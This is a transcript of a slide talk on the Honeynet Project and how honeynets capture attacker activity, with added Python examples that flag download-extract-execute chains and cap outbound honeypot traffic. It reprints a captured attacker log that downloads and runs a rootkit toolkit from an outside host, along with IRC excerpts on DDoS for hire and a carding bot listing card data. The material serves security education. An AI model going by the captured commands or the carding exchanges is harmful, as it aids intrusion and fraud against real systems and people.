Honeynets and The Honeynet Project - PowerPoint PPT Presentation

Provided by: Tria274
Slides: 47

Transcript and Presenter's Notes
1
Honeynets and The Honeynet Project
2
Speaker
  • List name, affiliations, and involvement with the
    Project.

3
Purpose
  • To explain the Honeynet Project, what we have
    learned, and what honeynets are.

4
Agenda
  • The Project and Research Alliance
  • Examples of Research
  • How Honeynets Work
  • Learning More

5
Honeynet Project
6
Problem
  • How can we defend against an enemy, when we don't
    even know who the enemy is?

7
One Possible Solution
  • To learn the tools, tactics, and motives of
    the blackhat community, and share the lessons
    learned.

8
Honeynet Project
  • Volunteer organization of security professionals.
  • Open Source, share all of our research and
    findings.
  • Deploy networks around the world to be hacked.
  • Everything we capture is happening in the wild.
  • We have no agenda, no employees, nor anything to
    sell.

9
Goals
  • Awareness: To raise awareness of the threats that
    exist.
  • Information: For those already aware, to teach
    and inform about the threats.
  • Research: To give organizations the capabilities
    to learn more on their own.

10
Project Organization
  • Non-profit (501c3) organization
  • Board of Directors
  • No more than two members from any organization.
  • Funded by the community, including the NIC.
  • Diverse set of skills and experiences.
  • Team works virtually, from around the world.

11
Honeynet Research Alliance
  • Starting in 2002, the Alliance is a forum of
    organizations around the world actively
    researching, sharing and deploying Honeynet
    technologies.
  • http://www.honeynet.org/alliance/

12
Alliance Members
  • South Florida Honeynet Project
  • Georgia Technical Institute
  • Azusa Pacific University
  • Paladion Networks Honeynet Project (India)
  • Internet Systematics Lab Honeynet Project
    (Greece)
  • Mexico Honeynet (Mexico)
  • Honeynet.BR (Brazil)
  • Irish Honeynet
  • Norwegian Honeynet
  • UK Honeynet
  • French Honeynet Project
  • Italian Honeynet Project
  • German Honeynet Project
  • Spanish Honeynet Project
  • Singapore Honeynet Project

13
Examples of Research
14
What we have captured
  • The Honeynet Project has captured primarily
    external threats that focus on targets of
    opportunity.
  • Little has yet been captured on advanced
    threats; few honeynets to date have been designed
    to capture them.

15
The Threat
  • Hundreds of scans a day.
  • Fastest time honeypot manually compromised, 15
    minutes (worm, under 60 seconds).
  • Life expectancies: a vulnerable Win32 system lasts
    under three hours, a vulnerable Linux system
    three months.
  • Primarily cyber-crime, focused on Win32 platforms
    and their users.
  • Attackers can control thousands, if not hundreds
    of thousands of systems.
  • Only getting worse, because the crime pays and is
    becoming highly organized.

16
Who am I?
17
That Was Then
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
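The keystroke log on slide 17 is what the Project's patched bash syslogged from a compromised honeypot. As an added example, not from the presentation, the following Python parses constructed lines in that assumed format (syslog timestamp, HISTORY tag, PID and UID, command; a placeholder host replaces the real one) and flags any shell whose first download, extract and execute commands occur in that order, the install chain the slide shows.

```python
import re
from collections import defaultdict

# Log format assumed here (syslog timestamp, HISTORY tag, PID/UID, command).
LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) HISTORY: "
                     r"PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$")

# Constructed sample session (placeholder host), modelled on slide 17.
SAMPLE_LOG = """\
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.example.org/LUCKROOT.TAR
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
"""

# Stages of the install pattern, in the order they are expected to appear.
STAGES = (
    ("download", re.compile(r"^(lynx|wget|curl|ftp|fetch)\b")),
    ("extract", re.compile(r"^(tar\s+-?\S*x|unzip\b|gunzip\b)")),
    ("execute", re.compile(r"^\./\S+")),
)

def parse_history(text):
    """Parse keystroke-log lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["pid"], rec["uid"] = int(rec["pid"]), int(rec["uid"])
            records.append(rec)
    return records

def classify(cmd):
    for name, pattern in STAGES:       # first matching stage wins, else None
        if pattern.match(cmd):
            return name
    return None

def toolkit_chains(records):
    """Return {pid: [stage, ...]} for shells whose first download, extract and
    execute commands occurred in that order (the chain seen on slide 17)."""
    seen = defaultdict(list)
    for rec in records:                # records are in log order
        stage = classify(rec["cmd"])
        if stage and stage not in seen[rec["pid"]]:
            seen[rec["pid"]].append(stage)
    expected = [name for name, _ in STAGES]
    return {pid: stages for pid, stages in seen.items() if stages == expected}
```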
18
This is Now
19
DDoS for Money
<J4ck> why don't you start charging for packet attacks?
<J4ck> "give me x amount and I'll take bla bla offline for this amount of time"
<J1LL> it was illegal last I checked
<J4ck> heh, then everything you do is illegal. Why not make money off of it?
<J4ck> I know plenty of people that'd pay exorbitant amounts for packeting
20
Credit Cards Exchanging
04:55:16 <COCO_JAA> !cc
04:55:23 <Chk> (COCO_JAA) CC for U: Bob Johns, P. O. Box 126, Wendel, CA 25631, United States, 510-863-4884, 4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) (TraDecS Chk_Bot FoR goldcard)
04:55:42 <COCO_JAA> !cclimit 4407070000588951
04:55:46 <Chk> (COCO_JAA) Limit for Ur MasterCard (5407070000788951) 0.881 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
04:56:55 <COCO_JAA> !cardablesite
04:57:22 <COCO_JAA> !cardable electronics
04:57:27 <Chk> (COCO_JAA) Site where you can card electronics (TraDecS Chk_bot FoR goldcard)
04:58:09 <COCO_JAA> !cclimit 4234294391131136
04:58:12 <Chk> (COCO_JAA) Limit for Ur Visa (4264294291131136) 9.697 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
21
How Honeynets Work
22
Honeypots
  • A honeypot is an information system resource
    whose value lies in unauthorized or illicit use
    of that resource.
  • Has no production value, so anything going to or
    from a honeypot is likely a probe, attack, or
    compromise.
  • Primary value to most organizations is
    information.

23
Advantages
  • Collect small data sets of high value.
  • Reduce false positives
  • Catch new attacks, false negatives
  • Work in encrypted or IPv6 environments
  • Simple concept requiring minimal resources.

24
Disadvantages
  • Limited field of view (microscope)
  • Risk (mainly high-interaction honeypots)

25
Types
  • Low-interaction
      • Emulates services, applications, and OSs.
      • Low risk and easy to deploy/maintain, but capture
        limited information.
  • High-interaction
      • Real services, applications, and OSs.
      • Capture extensive information, but high risk and
        time intensive to maintain.

26
Examples of Honeypots
Low Interaction
  • BackOfficer Friendly
  • KFSensor
  • Honeyd

High Interaction
  • Honeynets

27
Honeynets
  • High-interaction honeypot designed to capture
    in-depth information.
  • Information has different value to different
    organizations.
  • It's an architecture you populate with live
    systems, not a product or software.
  • Any traffic entering or leaving is suspect.

28
How it works
  • A highly controlled network where every packet
    entering or leaving is monitored, captured, and
    analyzed.
  • Data Control
  • Data Capture

http://www.honeynet.org/papers/honeynet/
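The two building blocks on slide 28 can be shown as a small simulation. This added example is not the Project's Honeywall code: it assumes the honeypot addresses, an outbound budget of 3 connections per honeypot per hour (GenII honeywalls enforced data control by limiting outbound connections; the figures here are assumed, not from the slides) and constructed flow records, then logs every flow (data capture) and drops outbound connections beyond the budget (data control).

```python
from collections import defaultdict, deque

# Assumed honeywall parameters (not from the slides): honeypot addresses,
# the per-honeypot outbound connection budget, and the window it applies to.
HONEYPOTS = {"10.0.0.5", "10.0.0.6"}
OUTBOUND_LIMIT = 3
WINDOW = 3600          # seconds

# Constructed flow records: (seconds since start, src, dst, proto).
SAMPLE_FLOWS = [
    (10, "198.51.100.9", "10.0.0.5", "tcp"),    # inbound probe: let it in
    (600, "10.0.0.5", "203.0.113.4", "tcp"),    # honeypot calling out
    (610, "10.0.0.5", "203.0.113.5", "tcp"),
    (620, "10.0.0.5", "203.0.113.6", "tcp"),
    (630, "10.0.0.5", "203.0.113.7", "tcp"),    # fourth in the hour: dropped
    (700, "10.0.0.6", "203.0.113.4", "udp"),    # other honeypot, own budget
    (4300, "10.0.0.5", "203.0.113.8", "tcp"),   # earlier ones aged out
]

class Honeywall:
    """Data capture records every flow; data control caps what leaves."""
    def __init__(self, honeypots, limit=OUTBOUND_LIMIT, window=WINDOW):
        self.honeypots, self.limit, self.window = honeypots, limit, window
        self.recent = defaultdict(deque)   # per-honeypot outbound timestamps
        self.capture = []                  # every flow seen, in or out
        self.alerts = []

    def handle(self, flow):
        t, src, dst, _proto = flow
        self.capture.append(flow)          # anything in or out is suspect: log it
        if src in self.honeypots:          # outbound: a compromised honeypot
            q = self.recent[src]
            while q and t - q[0] >= self.window:
                q.popleft()                # forget connections older than the window
            if len(q) >= self.limit:
                self.alerts.append((t, src, dst, "outbound limit exceeded"))
                return "drop"
            q.append(t)
            self.alerts.append((t, src, dst, "outbound connection from honeypot"))
            return "allow"
        if dst in self.honeypots:
            return "allow"                 # inbound: let attackers reach the bait
        return "drop"                      # neither side is a honeypot

def run(flows, honeypots=HONEYPOTS):
    hw = Honeywall(honeypots)
    return hw, [hw.handle(f) for f in flows]
```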
29
Honeynet - GenII
30
No Data Control
31
Data Control
32
(No Transcript)
33
Data Capture - Sebek
  • Hidden kernel module that captures all activity.
  • Dumps activity to the network.
  • The attacker cannot sniff Sebek's own traffic: the
    module hides packets matching its magic number and
    destination port from the honeypot's network stack.

34
(No Transcript)
35
Bootable CDROM
36
Distributed Capabilities
37
Issues
  • Require extensive resources to properly maintain.
  • Detection and anti-honeynet technologies have
    been introduced.
  • Can be used to attack or harm other non-Honeynet
    systems.
  • Privacy can be a potential issue.

38
Legal Contact for .mil / .gov
  • Department of Justice Computer Crime and
    Intellectual Property Section.
  • Paul Ohm
  • Number: (202) 514.1026
  • E-Mail: paul.ohm@usdoj.gov

39
Learning More
40
Challenges
  • The opportunity to study real attacks on your
    own, compare your analysis with others, and learn
    about blackhats.
  • Scan of the Month challenges
  • Forensic Challenge
  • Reverse Challenge
  • http://www.honeynet.org/misc/

41
Know Your Enemy papers
  • Series of papers dedicated to honeynet research
    and their findings.
  • Translated into over 10 different languages.
  • http://www.honeynet.org/papers/

42
Know Your Enemy 2nd Edition
http://www.honeynet.org/book
43
Contributing
Advanced Network Management Lab
YOU?
44
How to contribute
  • Volunteer!
  • Honeywall CDROM Subscription
  • PayPal Donation
  • Buy our Book
  • Funding

<project@honeynet.org> http://www.honeynet.org/funds/
45
Conclusion
  • The Honeynet Project is a non-profit, volunteer
    organization researching cyber threats using
    honeynet technologies, and sharing those lessons
    learned.
  • It is hoped our research can improve the
    awareness and security of the Internet community.

46
  • http://www.honeynet.org
  • <project@honeynet.org>